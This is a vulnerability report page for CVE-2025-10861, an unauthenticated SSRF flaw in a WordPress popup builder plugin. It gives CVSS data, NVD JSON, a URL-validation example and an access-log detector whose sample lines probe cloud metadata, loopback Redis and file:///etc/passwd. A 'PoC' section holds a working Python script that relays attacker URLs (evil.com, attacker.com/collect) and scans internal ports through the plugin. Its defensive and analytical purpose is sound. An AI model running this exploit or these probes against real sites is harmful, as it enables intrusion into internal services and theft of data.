Security Vulnerability Report
CVE-2025-10861 CVSS 7.5 HIGH

CVE-2025-10861

Published: 2025-10-24 12:15:37
Last Modified: 2026-04-15 00:35:42

Description

The Popup builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.1.4. This is due to insufficient validation on the URLs supplied via the URL parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services, as well as conduct network reconnaissance. The vulnerability was partially patched in version 2.1.4.
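The description names the root cause (insufficient validation of an attacker-supplied URL before the server fetches it, CWE-918). The following is an added example of the checks such a handler needs; it is not the plugin's code and not the fix shipped in 2.1.4. Everything in it is assumed for illustration: the `validate_outbound_url` name, the `demo.example.com` allowlist entry, the stub DNS table and the placeholder public addresses in it. The resolver is injected so the example runs offline.

```python
"""Outbound-URL validation for a "fetch this URL for me" endpoint.

Added example for CVE-2025-10861 (CWE-918); not the plugin's code or its
patch. The allowlist host, the stub DNS table and the public addresses in it
are constructed for the example so it runs offline.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
# Constructed allowlist: the one host a demo-import feature legitimately needs.
ALLOWED_HOSTS = {"demo.example.com"}

# Constructed stub DNS table (addresses are placeholders for public ones).
STUB_DNS = {
    "demo.example.com": ["93.184.216.34"],
    # A name under attacker control that mixes a public and an internal record.
    "rebind.example.com": ["93.184.216.35", "10.0.0.5"],
}


def resolve_all(host, resolver=None):
    """Every address `host` maps to: a literal IP as-is, otherwise via DNS.

    All records are checked, not just the first, because an attacker who
    controls the zone can return an internal address alongside a public one.
    """
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    if resolver is not None:  # injected table for offline runs
        return list(resolver.get(host, []))
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def validate_outbound_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=None):
    """Return (ok, reason). ok is True only when every check passes.

    allowed_hosts=None relaxes the allowlist to "any host"; the resolution
    check is then what stops requests to loopback, RFC 1918 and link-local
    (cloud metadata) addresses, including names that merely resolve there.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = parts.hostname  # urlsplit lowercases and strips IPv6 brackets
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, f"host not on allowlist: {host!r}"
    addrs = resolve_all(host, resolver)
    if not addrs:
        return False, f"host did not resolve: {host!r}"
    internal = [a for a in addrs if not ipaddress.ip_address(a).is_global]
    if internal:
        return False, f"host resolves to non-global address(es): {internal}"
    return True, "ok"
```

Two caveats the partial-patch wording hints at: a check done at validation time can be undone by DNS rebinding between the check and the connect, so the fetch should connect to the address that was validated and send the Host header separately; and a 3xx redirect from an allowed host to `http://127.0.0.1/` bypasses the check unless redirects are disabled or each hop is re-validated. In WordPress code the core helpers `wp_http_validate_url()` and `wp_safe_remote_get()` exist for exactly this situation.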

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected product as stated in the description:

Popup Builder plugin for WordPress <= 2.1.4 (2.1.4 contains only a partial fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# Vulnerable endpoint path (found in plugin code analysis)
VULNERABLE_ENDPOINT = "/wp-json/popup-builder/v1/fetch-demo"


def exploit_ssrf(target_url, attacker_controlled_url):
    """
    PoC for CVE-2025-10861 - SSRF in Popup Builder WordPress Plugin

    This exploits the insufficient URL validation in the plugin's FetchDemo
    endpoint. The vulnerable parameter allows attackers to make the server
    request arbitrary URLs.

    Usage:
        python exploit.py http://target-wordpress-site.com http://evil.com/malicious-endpoint

    Note: For authorized security testing only.
    """
    # Alternative vulnerable parameters
    params = {
        "url": attacker_controlled_url,  # Attacker-controlled URL parameter
        # "action": "fetch_demo",
        # "demo_url": attacker_controlled_url,
    }
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Attacker URL: {attacker_controlled_url}")
        # Send the malicious request
        response = requests.get(
            target_url.rstrip("/") + VULNERABLE_ENDPOINT,
            params=params,
            timeout=10,
            allow_redirects=False,
        )
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def scan_internal_port(target_url, internal_host, port):
    """
    Use SSRF to scan internal ports.

    Any HTTP reply from the target does not mean the port is open: the
    WordPress side answers whether or not its own fetch succeeded. Compare
    status, body length and elapsed time against a baseline taken on a port
    known to be closed to tell open from closed/filtered.
    """
    internal_url = f"http://{internal_host}:{port}"
    print(f"[*] Scanning {internal_host}:{port}")
    params = {"url": internal_url}
    try:
        response = requests.get(
            target_url.rstrip("/") + VULNERABLE_ENDPOINT,
            params=params,
            timeout=5,
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None
    print(
        f"[+] {internal_host}:{port} -> status {response.status_code}, "
        f"{len(response.content)} bytes in {response.elapsed.total_seconds():.2f}s"
    )
    return response


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python exploit.py <target_url> <attacker_url>")
        print("Example: python exploit.py http://victim.com http://attacker.com/collect")
        sys.exit(1)
    target = sys.argv[1]
    attacker = sys.argv[2]
    exploit_ssrf(target, attacker)
```
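On the defender's side, an exploitation attempt like the one above leaves a plain trace in the web server access log: a GET to the fetch route whose `url` parameter points at a loopback, private or link-local address, or uses a non-HTTP scheme. The following detection is an added example, not part of the page or the plugin. The route path `/wp-json/popup-builder/v1/fetch-demo` and the `url`/`demo_url` parameter names are taken from the PoC above and are that PoC's assumption, not verified against the plugin; the log lines are constructed in Apache combined format, and the function and constant names are invented for the example.

```python
"""Flag SSRF probes against a URL-fetching REST route in access logs.

Added example for CVE-2025-10861; not from the page or the plugin. Route path
and parameter names are assumptions carried over from the PoC. Sample log
lines are constructed (Apache combined format).
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

WATCHED_PATH = "/wp-json/popup-builder/v1/fetch-demo"  # assumption from the PoC
WATCHED_PARAMS = ("url", "demo_url")                    # assumption from the PoC
# Hostnames that only make sense as internal targets (cloud metadata, loopback).
SUSPICIOUS_HOSTS = {"localhost", "metadata", "metadata.google.internal"}

# Constructed sample: three probes, one legitimate fetch, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Oct/2025:12:20:01 +0000] "GET /wp-json/popup-builder/v1/fetch-demo?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [24/Oct/2025:12:20:02 +0000] "GET /wp-json/popup-builder/v1/fetch-demo?url=http%3A%2F%2F127.0.0.1%3A6379%2F HTTP/1.1" 200 87 "-" "python-requests/2.31"
198.51.100.9 - - [24/Oct/2025:12:21:10 +0000] "GET /wp-json/popup-builder/v1/fetch-demo?url=https%3A%2F%2Fdemo.example.com%2Fdemo.json HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Oct/2025:12:22:30 +0000] "GET /wp-json/popup-builder/v1/fetch-demo?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.9 - - [24/Oct/2025:12:23:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""


def classify_fetch_target(url):
    """Return a reason string if the fetched URL looks like an SSRF probe, else None."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return f"non-http scheme {scheme!r}"
    host = (parts.hostname or "").lower()
    if not host:
        return "empty host"
    if host in SUSPICIOUS_HOSTS:
        return f"internal hostname {host!r}"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: log-side checks cannot know what it resolves to, so
        # names are left to the server-side validator rather than guessed at.
        return None
    if not ip.is_global:
        return f"non-global address {host}"
    return None


def find_ssrf_probes(log_text):
    """Parse access-log lines and return one alert per suspicious fetch target."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != WATCHED_PATH:
            continue
        qs = parse_qs(target.query)  # percent-decodes the nested URL
        for name in WATCHED_PARAMS:
            for fetched in qs.get(name, []):
                reason = classify_fetch_target(fetched)
                if reason:
                    alerts.append({
                        "src": m.group("ip"),
                        "ts": m.group("ts"),
                        "param": name,
                        "fetched": fetched,
                        "reason": reason,
                    })
    return alerts


if __name__ == "__main__":
    for alert in find_ssrf_probes(SAMPLE_LOG):
        print(alert)
```

The status code is deliberately not used as a signal: as with the port-scan heuristic in the PoC, the WordPress side returns 200 for its own REST call regardless of whether the inner fetch reached anything. Pairing this with outbound egress logs from the web host (connections originating from the PHP worker to 169.254.169.254 or RFC 1918 space) confirms which probes actually landed.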

References

https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L15
https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L35
https://plugins.trac.wordpress.org/changeset/3369146/
https://plugins.trac.wordpress.org/changeset/3379308/
https://www.wordfence.com/threat-intel/vulnerabilities/id/5f4767b5-5dd6-4a2a-b44a-5297432286b1?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10861",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-24T12:15:37.340",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Popup builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.1.4. This is due to insufficient validation on the URLs supplied via the URL parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services, as well as conduct network reconnaissance. The vulnerability was partially patched in version 2.1.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L15", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L35", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3369146/", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3379308/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5f4767b5-5dd6-4a2a-b44a-5297432286b1?source=cve", "source": "[email protected]"}
    ]
  }
}
```